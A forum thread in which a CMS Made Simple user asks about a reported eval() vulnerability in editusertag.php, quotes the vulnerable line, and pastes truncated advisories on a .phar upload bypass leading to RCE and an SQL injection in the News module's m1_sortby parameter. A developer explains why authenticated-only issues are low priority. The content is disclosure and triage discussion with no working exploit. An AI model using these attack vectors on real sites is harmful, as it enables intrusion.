Someone just pointed this out to me: https://www.exploit-db.com/exploits/49345. Wondered if a fix is available.
Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.
// Vulnerable eval() code
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {
...
CMSMS eval vulnerability
Re: CMSMS eval vulnerability
Sorry but hat is not a vulnerability:
Please read: https://www.cmsmadesimple.org/community ... nerability
Soooo... you need to login as administrator to hack your own site?.... really???"Reproduction Steps:
1. Login as administrator user and navigate to Extensions->User Defined Tags"
Please read: https://www.cmsmadesimple.org/community ... nerability
"There are 10 types of people in this world, those who understand binary... and those who don't."
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
[SOLVED] Re: CMSMS eval vulnerability
You would know better than I. Total newb when it comes to things like that. I considered what you said prior to posting. I wondered if they meant this gave you RCE on the webhost's server, not to affect the website you already have admin access to, but to the server more broadly.
Re: CMSMS vulnerability
Sorry, the person that pointed this out to me was actually pointing me to a different place than I thought. Maybe this will prove more helpful to the dev team.
MS Made Simple - File upload bypass with .phar extension lead to RCE riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URLhttp://www.cmsmadesimple.org/ <http://www.cmsmadesimple.org/>
Vulnerability File upload bypass with .phar extension lead to RCE
2) Vulnerability Description
The vulnerability affect the `FilePicker` module,
it is possible to bypass the restriction and upload a malicious file with `.phar` extension to gain Remote Code
Execution.
This vulnerability is remotely...
CMS Made Simple SQL injection on m1_sortby parameter riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URLhttp://www.cmsmadesimple.org/ <http://www.cmsmadesimple.org/>
Vulnerability SQL injection
2) Vulnerability Description
The affected software is vulnerable to SQL injection via the m1_sortby POST parameter of the News module, reachable via
the moduleinterface.php page.
The `sortby` parameter is sanitized by replacing the `'` with the `_` character, anyway it is...
MS Made Simple - File upload bypass with .phar extension lead to RCE riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URLhttp://www.cmsmadesimple.org/ <http://www.cmsmadesimple.org/>
Vulnerability File upload bypass with .phar extension lead to RCE
2) Vulnerability Description
The vulnerability affect the `FilePicker` module,
it is possible to bypass the restriction and upload a malicious file with `.phar` extension to gain Remote Code
Execution.
This vulnerability is remotely...
CMS Made Simple SQL injection on m1_sortby parameter riccardo krauter (Mar 19)
1) Summary
Affected software CMS Made Simple-2.2.15
Vendor URLhttp://www.cmsmadesimple.org/ <http://www.cmsmadesimple.org/>
Vulnerability SQL injection
2) Vulnerability Description
The affected software is vulnerable to SQL injection via the m1_sortby POST parameter of the News module, reachable via
the moduleinterface.php page.
The `sortby` parameter is sanitized by replacing the `'` with the `_` character, anyway it is...
Re: CMSMS eval vulnerability
To be clear my initial comment was related to the RCE not your post which is a pertinent question.
WRT to your last post: do you have a link that we can follow? Thanks.
WRT to your last post: do you have a link that we can follow? Thanks.
"There are 10 types of people in this world, those who understand binary... and those who don't."
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
Re: CMSMS eval vulnerability
https://seclists.org/fulldisclosure/ and search for 2.2.15
Re: CMSMS eval vulnerability
Looking at those I'll refer you back to my original reply since they all require authentication. There are situations where we may tighten up a bit security specifically where there is a risk of escalation of rights and there is no mitigation via permission granularity and we'll do it as time permits as it is stated in the link I posted. Other than those we pay particular attention to, and try to fix, those that don't require authentication as those are the ones that are extremely dangerous. And we do it as fast as we can and in a collaborative way whenever possible.
"There are 10 types of people in this world, those who understand binary... and those who don't."
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!
* by the way: English is NOT my native language (sorry for any mistakes...).
Code of Condut | CMSMS Docs | Help Support CMSMS
My developer Page on the Forge
GeekMoot 2015 in Ghent, Belgium: I was there!
GeekMoot 2016 in Leicester, UK: I was there!
DevMoot 2023 in Cynwyd, Wales: I was there!